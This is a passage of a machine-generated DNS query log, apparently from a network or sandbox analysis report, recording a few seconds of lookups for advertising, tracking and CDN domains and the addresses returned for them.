                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.014365911 CEST1.1.1.1192.168.2.40xce16No error (0)k8s-kongow-monitorp-e03b5a49ad-1517292392.us-east-1.elb.amazonaws.com34.227.208.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.124794960 CEST1.1.1.1192.168.2.40xb14dNo error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.124794960 CEST1.1.1.1192.168.2.40xb14dNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.124794960 CEST1.1.1.1192.168.2.40xb14dNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.124794960 CEST1.1.1.1192.168.2.40xb14dNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.124794960 CEST1.1.1.1192.168.2.40xb14dNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.125505924 CEST1.1.1.1192.168.2.40xbf2No error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.214440107 CEST1.1.1.1192.168.2.40x7973No error (0)static-cdn.spot.imi6v7n3vkjoy.i5w3rm3gfr.ioriveredge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.214440107 CEST1.1.1.1192.168.2.40x7973No error (0)i6v7n3vkjoy.i5w3rm3gfr.ioriveredge.netdualstack.ioriver.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.214440107 CEST1.1.1.1192.168.2.40x7973No error (0)dualstack.ioriver.map.fastly.net199.232.215.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.214440107 CEST1.1.1.1192.168.2.40x7973No error (0)dualstack.ioriver.map.fastly.net199.232.211.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.215089083 CEST1.1.1.1192.168.2.40x9c52No error (0)static-cdn.spot.imi6v7n3vkjoy.i5w3rm3gfr.ioriveredge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.215089083 CEST1.1.1.1192.168.2.40x9c52No error (0)i6v7n3vkjoy.i5w3rm3gfr.ioriveredge.netdualstack.ioriver.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.441104889 CEST1.1.1.1192.168.2.40xba24No error (0)api-2-0.spot.imk8s-kongow-generalp-f832200e79-1219784492.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.441104889 CEST1.1.1.1192.168.2.40xba24No error (0)k8s-kongow-generalp-f832200e79-1219784492.us-east-1.elb.amazonaws.com18.207.87.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.441104889 CEST1.1.1.1192.168.2.40xba24No error (0)k8s-kongow-generalp-f832200e79-1219784492.us-east-1.elb.amazonaws.com54.197.49.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.441104889 CEST1.1.1.1192.168.2.40xba24No error (0)k8s-kongow-generalp-f832200e79-1219784492.us-east-1.elb.amazonaws.com3.217.76.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.441104889 CEST1.1.1.1192.168.2.40xba24No error (0)k8s-kongow-generalp-f832200e79-1219784492.us-east-1.elb.amazonaws.com3.213.74.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.441368103 CEST1.1.1.1192.168.2.40x79a0No error (0)api-2-0.spot.imk8s-kongow-generalp-4b9a3bfec6-974801183.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.504990101 CEST1.1.1.1192.168.2.40x1749No error (0)idpix.media6degrees.comidpix.media6degrees.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.504990101 CEST1.1.1.1192.168.2.40x1749No error (0)map.media6degrees.commap.media6degrees.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.507936954 CEST1.1.1.1192.168.2.40x72c7No error (0)lg3.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.508210897 CEST1.1.1.1192.168.2.40xf34No error (0)idpix.media6degrees.comidpix.media6degrees.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.508210897 CEST1.1.1.1192.168.2.40xf34No error (0)map.media6degrees.commap.media6degrees.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.674335957 CEST1.1.1.1192.168.2.40xe904No error (0)sync.mathtag.compixel-origin.mathtag.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.674604893 CEST1.1.1.1192.168.2.40xd60dNo error (0)sync.mathtag.compixel-origin.mathtag.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.674604893 CEST1.1.1.1192.168.2.40xd60dNo error (0)pixel-origin.mathtag.com74.121.140.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.674604893 CEST1.1.1.1192.168.2.40xd60dNo error (0)pixel-origin.mathtag.com216.200.232.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.674604893 CEST1.1.1.1192.168.2.40xd60dNo error (0)pixel-origin.mathtag.com216.200.232.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.761837959 CEST1.1.1.1192.168.2.40x463bNo error (0)us.creativecdn.com185.184.10.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.768733025 CEST1.1.1.1192.168.2.40xe91eNo error (0)rtb.adentifi.com52.54.66.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.768733025 CEST1.1.1.1192.168.2.40xe91eNo error (0)rtb.adentifi.com44.218.170.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.768733025 CEST1.1.1.1192.168.2.40xe91eNo error (0)rtb.adentifi.com54.165.51.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.768733025 CEST1.1.1.1192.168.2.40xe91eNo error (0)rtb.adentifi.com3.233.49.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.768733025 CEST1.1.1.1192.168.2.40xe91eNo error (0)rtb.adentifi.com3.215.91.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.768733025 CEST1.1.1.1192.168.2.40xe91eNo error (0)rtb.adentifi.com3.208.227.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.831259966 CEST1.1.1.1192.168.2.40x876dNo error (0)qsearch-a.akamaihd.netqsearch-a.akamaihd.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.832355976 CEST1.1.1.1192.168.2.40x845eNo error (0)qsearch-a.akamaihd.netqsearch-a.akamaihd.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.965096951 CEST1.1.1.1192.168.2.40x2d68No error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.965096951 CEST1.1.1.1192.168.2.40x2d68No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.965096951 CEST1.1.1.1192.168.2.40x2d68No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.965096951 CEST1.1.1.1192.168.2.40x2d68No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.965096951 CEST1.1.1.1192.168.2.40x2d68No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.966340065 CEST1.1.1.1192.168.2.40xd464No error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.001045942 CEST1.1.1.1192.168.2.40xf29bNo error (0)hblg.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.035964012 CEST1.1.1.1192.168.2.40x4dd0No error (0)gum.criteo.comgum.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.035988092 CEST1.1.1.1192.168.2.40x22feNo error (0)gum.criteo.comgum.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.035988092 CEST1.1.1.1192.168.2.40x22feNo error (0)gum.nl3.vip.prod.criteo.com178.250.1.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.037127018 CEST1.1.1.1192.168.2.40xbd98No error (0)hbx.media.net88.221.124.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.106168985 CEST1.1.1.1192.168.2.40x789fNo error (0)c21lg-d.media.netstar.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.106295109 CEST1.1.1.1192.168.2.40x66dcNo error (0)c21lg-d.media.netstar.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.109049082 CEST1.1.1.1192.168.2.40x4d00No error (0)sync.go.sonobi.comiad-2-sync.go.sonobi.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.109049082 CEST1.1.1.1192.168.2.40x4d00No error (0)iad-2-sync.go.sonobi.com69.166.1.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.109049082 CEST1.1.1.1192.168.2.40x4d00No error (0)iad-2-sync.go.sonobi.com69.166.1.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.109049082 CEST1.1.1.1192.168.2.40x4d00No error (0)iad-2-sync.go.sonobi.com69.166.1.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.109049082 CEST1.1.1.1192.168.2.40x4d00No error (0)iad-2-sync.go.sonobi.com69.166.1.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.109551907 CEST1.1.1.1192.168.2.40x1117No error (0)sync.go.sonobi.comiad-2-sync.go.sonobi.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.109884977 CEST1.1.1.1192.168.2.40xd81eNo error (0)medianet-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.130804062 CEST1.1.1.1192.168.2.40x876No error (0)medianet-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.179153919 CEST1.1.1.1192.168.2.40x98aNo error (0)rtb.mfadsrvr.compool.dorpat.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.179153919 CEST1.1.1.1192.168.2.40x98aNo error (0)pool.dorpat.iponweb.netdorpat.geo.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.180377960 CEST1.1.1.1192.168.2.40x2b70No error (0)rtb.mfadsrvr.compool.dorpat.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.180377960 CEST1.1.1.1192.168.2.40x2b70No error (0)pool.dorpat.iponweb.netdorpat.geo.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.180377960 CEST1.1.1.1192.168.2.40x2b70No error (0)dorpat.geo.iponweb.net35.214.199.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.453172922 CEST1.1.1.1192.168.2.40xbda9No error (0)akl-navvy.media.net34.160.55.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.456640959 CEST1.1.1.1192.168.2.40x5aaNo error (0)bttrack.com192.132.33.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.456640959 CEST1.1.1.1192.168.2.40x5aaNo error (0)bttrack.com192.132.33.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.456640959 CEST1.1.1.1192.168.2.40x5aaNo error (0)bttrack.com192.132.33.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.638295889 CEST1.1.1.1192.168.2.40x66b7No error (0)warp.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.646116972 CEST1.1.1.1192.168.2.40x6e1dNo error (0)lg3.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.716972113 CEST1.1.1.1192.168.2.40x6dddNo error (0)u.ipw.metadsp.co.ukpool-eu.rome.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.716972113 CEST1.1.1.1192.168.2.40x6dddNo error (0)pool-eu.rome.iponweb.netrome-stable-europe-west4.pumpkin.uverse.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.716972113 CEST1.1.1.1192.168.2.40x6dddNo error (0)rome-stable-europe-west4.pumpkin.uverse.iponweb.net35.214.132.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.717031002 CEST1.1.1.1192.168.2.40xff35No error (0)u.ipw.metadsp.co.ukpool-eu.rome.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.717031002 CEST1.1.1.1192.168.2.40xff35No error (0)pool-eu.rome.iponweb.netrome-stable-europe-west4.pumpkin.uverse.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.852607012 CEST1.1.1.1192.168.2.40x1f75No error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.852607012 CEST1.1.1.1192.168.2.40x1f75No error (0)ib.anycast.adnxs.com185.89.210.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.852607012 CEST1.1.1.1192.168.2.40x1f75No error (0)ib.anycast.adnxs.com185.89.211.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.852607012 CEST1.1.1.1192.168.2.40x1f75No error (0)ib.anycast.adnxs.com185.89.210.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.852607012 CEST1.1.1.1192.168.2.40x1f75No error (0)ib.anycast.adnxs.com185.89.210.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.852607012 CEST1.1.1.1192.168.2.40x1f75No error (0)ib.anycast.adnxs.com185.89.210.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.852607012 CEST1.1.1.1192.168.2.40x1f75No error (0)ib.anycast.adnxs.com185.89.210.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.852607012 CEST1.1.1.1192.168.2.40x1f75No error (0)ib.anycast.adnxs.com185.89.210.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.852607012 CEST1.1.1.1192.168.2.40x1f75No error (0)ib.anycast.adnxs.com185.89.210.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.852607012 CEST1.1.1.1192.168.2.40x1f75No error (0)ib.anycast.adnxs.com185.89.211.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.852607012 CEST1.1.1.1192.168.2.40x1f75No error (0)ib.anycast.adnxs.com185.89.210.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.852607012 CEST1.1.1.1192.168.2.40x1f75No error (0)ib.anycast.adnxs.com185.89.210.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.852607012 CEST1.1.1.1192.168.2.40x1f75No error (0)ib.anycast.adnxs.com185.89.210.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:10.892812967 CEST1.1.1.1192.168.2.40xfd69No error (0)cs.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.533320904 CEST1.1.1.1192.168.2.40x73a6No error (0)s.seedtag.com34.149.50.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.748925924 CEST1.1.1.1192.168.2.40x6ffcNo error (0)akl-navvy.media.net34.160.55.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.750603914 CEST1.1.1.1192.168.2.40x4a10No error (0)rtb.mfadsrvr.compool.dorpat.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.750603914 CEST1.1.1.1192.168.2.40x4a10No error (0)pool.dorpat.iponweb.netdorpat.geo.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.750603914 CEST1.1.1.1192.168.2.40x4a10No error (0)dorpat.geo.iponweb.net35.214.199.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.752016068 CEST1.1.1.1192.168.2.40x8042No error (0)rtb.mfadsrvr.compool.dorpat.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.752016068 CEST1.1.1.1192.168.2.40x8042No error (0)pool.dorpat.iponweb.netdorpat.geo.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.752207041 CEST1.1.1.1192.168.2.40xd69No error (0)c21lg-d.media.netstar.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.753268957 CEST1.1.1.1192.168.2.40xb5baNo error (0)c21lg-d.media.netstar.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:11.756825924 CEST1.1.1.1192.168.2.40x16dNo error (0)hbx.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.201065063 CEST1.1.1.1192.168.2.40xc7b5No error (0)contextual.media.net88.221.124.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.233310938 CEST1.1.1.1192.168.2.40x106bNo error (0)cs.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.433517933 CEST1.1.1.1192.168.2.40xddf8No error (0)s2s.t13.io34.107.140.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.515072107 CEST1.1.1.1192.168.2.40x7d06No error (0)visitor.omnitagjs.comvisitor-fra02.omnitagjs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.515072107 CEST1.1.1.1192.168.2.40x7d06No error (0)visitor-fra02.omnitagjs.com185.255.84.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.515072107 CEST1.1.1.1192.168.2.40x7d06No error (0)visitor-fra02.omnitagjs.com185.255.84.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.515996933 CEST1.1.1.1192.168.2.40xb16dNo error (0)visitor.omnitagjs.comvisitor-fra02.omnitagjs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.630974054 CEST1.1.1.1192.168.2.40xdbb9No error (0)sync.outbrain.comalldcs.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.630974054 CEST1.1.1.1192.168.2.40xdbb9No error (0)alldcs.outbrain.orgnydc1.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.630974054 CEST1.1.1.1192.168.2.40xdbb9No error (0)nydc1.outbrain.org70.42.32.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.630985975 CEST1.1.1.1192.168.2.40xcc76No error (0)sync.outbrain.comalldcs.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:12.630985975 CEST1.1.1.1192.168.2.40xcc76No error (0)alldcs.outbrain.orgnydc1.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.139087915 CEST1.1.1.1192.168.2.40x8f5aNo error (0)exchange.mediavine.com3.76.245.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.139087915 CEST1.1.1.1192.168.2.40x8f5aNo error (0)exchange.mediavine.com52.57.182.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.139087915 CEST1.1.1.1192.168.2.40x8f5aNo error (0)exchange.mediavine.com3.120.11.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.139087915 CEST1.1.1.1192.168.2.40x8f5aNo error (0)exchange.mediavine.com3.124.241.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.139087915 CEST1.1.1.1192.168.2.40x8f5aNo error (0)exchange.mediavine.com52.28.199.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.139087915 CEST1.1.1.1192.168.2.40x8f5aNo error (0)exchange.mediavine.com18.195.28.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.347754002 CEST1.1.1.1192.168.2.40x89f2No error (0)s2s.t13.io34.107.140.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.408381939 CEST1.1.1.1192.168.2.40x7af7No error (0)sync.outbrain.comalldcs.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.408381939 CEST1.1.1.1192.168.2.40x7af7No error (0)alldcs.outbrain.orgnydc1.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.408381939 CEST1.1.1.1192.168.2.40x7af7No error (0)nydc1.outbrain.org70.42.32.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.408458948 CEST1.1.1.1192.168.2.40xaa92No error (0)sync.outbrain.comalldcs.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.408458948 CEST1.1.1.1192.168.2.40xaa92No error (0)alldcs.outbrain.orgnydc1.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.525320053 CEST1.1.1.1192.168.2.40xbfa6No error (0)visitor.omnitagjs.comvisitor-fra02.omnitagjs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.525320053 CEST1.1.1.1192.168.2.40xbfa6No error (0)visitor-fra02.omnitagjs.com185.255.84.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.525320053 CEST1.1.1.1192.168.2.40xbfa6No error (0)visitor-fra02.omnitagjs.com185.255.84.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.525331020 CEST1.1.1.1192.168.2.40xd1c6No error (0)visitor.omnitagjs.comvisitor-fra02.omnitagjs.comCNAME (Canonical name)IN (0x0001)false
